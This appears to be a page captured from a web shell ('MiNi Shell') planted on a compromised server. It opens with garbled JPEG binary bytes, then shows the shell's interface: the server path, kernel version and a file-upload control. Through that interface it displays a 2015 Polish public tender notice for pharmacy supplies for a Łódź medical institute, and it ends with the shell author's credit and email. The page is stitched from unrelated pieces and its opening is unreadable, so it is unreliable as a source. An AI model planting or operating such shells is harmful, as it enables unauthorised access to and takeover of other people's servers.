JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151223/188933-N-2015.html

<p class="kh_header"><b>Łódź: Dostawa utensyliów aptecznych dla Instytutu CZMP - ZP/178/2015</b><br>
<b>Numer ogłoszenia: 188933 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 42 271 17 52; 271 17 53, faks 42 271 17 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa utensyliów aptecznych dla Instytutu CZMP - ZP/178/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br/>Dostawa utensyliów aptecznych dla Instytutu CZMP
<br/>	1	.	Butelka szklana apteczna oranżowa  - [10 ml] x 1 szt.	-	5000	szt.
<br/>	2	.	Butelka szklana apteczna oranżowa  Jałowa z zakrętka z zakraplaczem [10 ml] x 1 szt.	-	500	szt.
<br/>	3	.	Butelka szklana apteczna oranżowa , - [20 ml] x 1 szt.	-	2000	szt.
<br/>	4	.	Butelka szklana apteczna oranżowa , - [100 ml] x 1 szt.	-	7500	szt.
<br/>	5	.	Butelka szklana apteczna oranżowa , - [200 ml] x 1 szt.	-	6000	szt.
<br/>	6	.	Butelka szklana apteczna oranżowa , - [300 ml] x 1 szt.	-	1500	szt.
<br/>	7	.	Butelka szklana apteczna oranżowa , - [500 ml] x 1 szt.	-	1500	szt.
<br/>	8	.	Butelka szklana apteczna oranżowa , - [1000 ml] x 1 szt.	-	1000	szt.
<br/>	9	.	Nakrętka do butelki aptecznej , - [śr. 18mm] x 1 op. =50 szt.	-	200	op.
<br/>	10	.	Nakrętka do butelki aptecznej  - [śr. 22mm] x 1 op. = 50 szt.	-	150	op.
<br/>	11	.	Nakrętka do butelki aptecznej  - [śr. 28mm] x 1 op. = 50 szt.	-	300	op.
<br/>	12	.	Nakrętka do butelki aptecznej  - [śr. 32mm] x 1 op. = 50 szt.	-	50	op.
<br/>	13	.	Zakraplacz do butelki aptecznej, - [śr. 18mm] x 1 op. = 50 szt.	-	50	op.
<br/>	14	.	Zakraplacz do butelki aptecznej jałowy, - [śr. 18mm] x 1 szt.	-	500	szt.
<br/>	15	.	Bibuła filtracyjna (01-1.04), - [45cm x 65cm] x 1 op. = 100 arkuszy	-	2	op.
<br/>	16	.	Opłatki skrobiowe do proszków, - [nr 2] x 1 op.= 500 zestawów x 2 szt	-	5	op.
<br/>	17	.	Opłatki skrobiowe do proszków, - [nr 3] x 1 op. = 500 zestawów x 2 szt.	-	75	op.
<br/>	18	.	Opłatki skrobiowe do proszków, - [nr 4] x 1 op.= 500 zestawów x 2 szt.	-	75	op.
<br/>	19	.	Opłatki skrobiowe do proszków, - [nr 6] x 1 op. = 500 zestawów x 2 szt.	-	3	op.
<br/>	20	.	Podkłady pergaminowe, - [śr. 75 mm] x 1 op. = 100 szt.	-	10	op.
<br/>	21	.	Podkłady pergaminowe, - [śr. 90 mm] x 1 op. = 100 szt.	-	10	op.
<br/>	22	.	Podkłady pergaminowe, - [śr. 120 mm] x 1 op. = 100 szt.	-	10	op.
<br/>	23	.	Pudełka apteczne białe do maści, - x 1 poj. 10 g	-	500	poj.
<br/>	24	.	Pudełka apteczne białe do maści, - x 1 poj. 20 g	-	1000	poj.
<br/>	25	.	Pudełka apteczne białe do maści, - x 1 poj. 30 g	-	2500	poj.
<br/>	26	.	Pudełka apteczne białe do maści, - x 1 poj. 50 g	-	2500	poj.
<br/>	27	.	Pudełka apteczne białe do maści, - x 1 poj. 100 g	-	1500	poj.
<br/>	28	.	Tuba do maści aluminiowa, - [75g bez nadruku] x 1 szt.	-	10000	szt.
<br/>	30	.	Bagietka szklana, - [dł. 300mm] x 1 szt.	-	8	szt.
<br/>	31	.	Lejek laboratoryjny, - [śr. 80mm] x 1 szt.	-	5	szt.
<br/>	32	.	Lejek laboratoryjny, - [śr. 100mm] x 1 szt.	-	5	szt.
<br/>	33	.	Lejek laboratoryjny, - [śr. 150mm] x 1 szt.	-	5	szt.
<br/>	34	.	Zlewka szklana wysoka, - [poj. 25 ml] x 1 szt.	-	10	szt.
<br/>	35	.	Zlewka szklana wysoka, - [poj. 50 ml] x 1 szt.	-	10	szt.
<br/>	36	.	Zlewka szklana wysoka, - [poj. 100 ml] x 1 szt.	-	10	szt.
<br/>	37	.	Zlewka szklana wysoka, - [poj. 150 ml] x 1 szt.	-	5	szt.
<br/>	38	.	Zlewka szklana wysoka, - [poj. 200 ml] x 1 szt.	-	5	szt.
<br/>	40	.	Zlewka szklana wysoka, - [poj. 400 ml] x 1 szt.	-	10	szt.
<br/>	41	.	Zlewka szklana wysoka, - [poj. 600 ml] x 1 szt.	-	5	szt.
<br/>	43	.	Zlewka szklana wysoka, - [poj. 1000 ml] x 1 szt.	-	3	szt.
<br/>	44	.	Zlewka szklana wysoka, - [poj. 2000 ml] x 1 szt.	-	3	szt.
<br/>	45	.	Zlewka szklana wysoka, - [poj. 3000 ml] x 1 szt.	-	3	szt.
<br/>	46	.	Zlewka szklana wysoka, - [poj. 5000 ml] x 1 szt.	-	1	szt.
<br/>	47	.	Cylinder miarowy poj. 100 ml z działką elementarną skali 1 ml	-	3	szt.
<br/>	48	.	Cylinder miarowy poj. 250 ml z działką elementarną skali 1 ml	-	3	szt.
<br/>	49	.	Moździerz apteczny, - [śr. 96mm] x 1 szt.	-	3	szt.
<br/>	50	.	Moździerz apteczny, - [śr. 120mm] x 1 szt.	-	2	szt.
<br/>	52	.	Moździerz apteczny, - [śr. 190-196mm] x 1 szt.	-	1	szt.
<br/>	53	.	Tłuczek do moździerza, - [dł. 12cm] x 1 szt.	-	5	szt.
<br/>	54	.	Tłuczek do moździerza, - [dł. 23-23,6cm] x 1 szt.	-	4	szt.
<br/>	55	.	Łopatka stalowa, - [sz. 30-35 mm, dł. 250-270mm] x 1 szt.	-	3	szt.
<br/>	56	.	Łyżka apteczna stalowa, - [dł. 200-220mm] x 1 szt.	-	2	szt.
<br/>	57	.	Sączki bakteryjne celulozowe, - [0,22 um] x 1 szt.	-	100	szt.
<br/>	58	.	Filtr jednorazowy sterylny do jałowego sączenia kropli ocznych] x 1 szt.	-	100	szt.
<br/>	59	.	Gumki recepturki, - [rozmiar 9mm] x 1 kg	-	5	op.
<br/>	60	.	Gumki recepturki, - [rozmiar 11mm] x 1 kg	-	5	op.
<br/>	61	.	Test skuteczności sterylizacji termicznej typu Sporal S, - x 1 op. 4 szt.	-	5	op.
<br/>	62	.	Torebki recepturowe białe z rozkładanym spodem, - [0,25 kg] x 1 szt.	-	12000	szt.
<br/>	63	.	Torebki recepturowe białe z rozkładanym spodem, - [0,5 kg] x 1 szt.	-	4000	szt.
<br/>	64	.	Torebki recepturowe białe z rozkładanym spodem, - [1,0 kg] x 1 szt.	-	3000	szt.
<br/>	65	.	Etykiety samoprzylepne o treści Zmieszac przed użyciem	-	500	szt.
<br/>	66	.	Etykiety samoprzylepne o treści Przechowywać w chłodnym miejscu	-	500	szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.68.00.00-0, 33.77.20.00-2, 33.79.20.00-8, 33.79.00.00-4, 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 66.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli wykaże, że posiada aktualne zezwolenie, koncesję lub licencję Głównego Inspektora Farmaceutycznego lub Ministra Zdrowia lub innej jednostki uprawnionej - w zakresie obrotu produktami leczniczymi - na prowadzenie hurtowni lub składu konsygnacyjnego oraz w zakresie wytwarzania produktów leczniczych - dla wytwórcy - ważne na dzień składania ofert (DOTYCZY - Pozycji 16, 17, 18, 19)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;"><br/>1.Potwierdzenie dopuszczenia produktu do obrotu na terytorium RP zgodnie z przepisami ustawy o wyrobach medycznych z 20.05.2010, Dz.U. Nr 107, poz. 679.-Oświadczenie Wykonawcy -(DOTYCZY - Pozycji 16, 17, 18, 19)
<br/>2.Dokumenty potwierdzające dopuszczenie produktu leczniczego do obrotu i wpisanie do rejestru produktów leczniczych dopuszczonych do obrotu zgodnie z art. 28 ust. 1 ustawy Prawo farmaceutyczne z dnia 06.09.2001 r. z późniejszymi zmianami -Aktualne pozwolenie na dopuszczenie do obrotu surowca farmaceutycznego</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców Zamawiający żąda dołączenia do oferty wypełnionego oświadczenia z wykazem zakresu części zamówienia zlecanych podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostaw zapotrzebowania częściowego - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br/>Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach, w przypadku terminu obowiązywania umowy dłuższego niż 12 miesięcy, w przypadku:
<br/>1.zmiany wysokości wynagrodzenia należnego wykonawcy, w przypadku zmiany:
<br/>a)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
<br/>b)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
<br/>-jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
<br/>2.zmiany nazwy handlowej/własnej produktu/nr katalogowego przy zachowaniu jego parametrów;
<br/>3.zmiany terminu realizacji zamówienia w przypadku niewykorzystania ilości w okresie trwania umowy;
<br/>4.zmiany sposobu konfekcjonowania a co za tym idzie liczby opakowań. W wyniku niniejszych zmian Zamawiający przewiduje możliwość zmiany ceny jednostkowej opakowania, która zostanie wyliczona z proporcji;
<br/>5.przejściowego braku produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o takich samych parametrach, co produkt objęty umową, po cenie jednostkowej zaoferowanej w ofercie bądź niższej;
<br/>6.wygaśnięcia pozwolenia na dopuszczenie do obrotu oferowanego produktu;
<br/>7.wprowadzenia zamiennika oferowanego produktu lub wyłączenia produktu z umowy, w przypadku zakończenia, wstrzymania produkcji lub wycofania oferowanego produktu z rynku;
<br/>8.zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
<br/>9.zmiany formy prawnej prowadzonej działalności gospodarczej;
<br/>10.zmiany adresu siedziby firmy i zmiany adresu zamieszkania właściciela lub współwłaściciela firmy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielna Sekcja Zamówień Publicznych Instytutu Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2016 godzina 10:00, miejsce: Samodzielna Sekcja Zamówień Publicznych Instytutu Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com